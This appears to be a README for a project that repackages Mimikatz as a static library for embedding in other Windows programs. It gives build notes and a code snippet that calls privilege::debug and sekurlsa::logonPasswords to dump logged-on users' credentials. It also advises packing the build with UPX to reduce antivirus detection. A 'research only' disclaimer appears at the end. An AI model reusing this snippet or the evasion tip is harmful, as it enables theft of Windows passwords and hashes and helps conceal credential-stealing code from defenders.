Mimikatz built as a static library.
This project is configured for Visual Studio 2019 and may not build with other versions.
Supported target systems: Windows 7/8/10/11, Windows Server 2008/2012/2016/2019, 32-bit and 64-bit.
Unlike original mimikatz
, it does not include mimilib
, mimidrv
and mimispool
. Also, minesweeper
, busylights
and some other rarely used modules are disabled.
Important: set "Linker/General/Use Library Dependency Input" to "Yes", otherwise globals like mimikatz_modules
may remain uninitialized and the program will crash. Source: https://ofekshilon.com/2013/04/06/forcing-construction-of-global-objects-in-static-libraries/
#include "mimikatz-staticlib/mimikatz/mimikatz-staticlib.h"
mimikatz_begin();
std::wcout << mimkatz_exec(L"privilege::debug") << L"\n";
std::wcout << mimkatz_exec(L"sekurlsa::logonPasswords") << L"\n";
std::wcout << mimkatz_exec(L"coffee") << L"\n";
mimikatz_end();
Do a 64-bit build and pack it with UPX to reduce detection by antivirus software.
Refer to original @gentilkiwi/mimikatz repository and its Wiki for more information.
This project is research only, please do not use for illegal purposes.
Mimikatz © Benjamin DELPY gentilkiwi
([email protected]) / Vincent LE TOUX ([email protected])
http://blog.gentilkiwi.com/mimikatz
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/
If you use this product, please consider donating to the author of original Mimikatz, Benjamin Delpy (https://www.paypal.me/delpy/).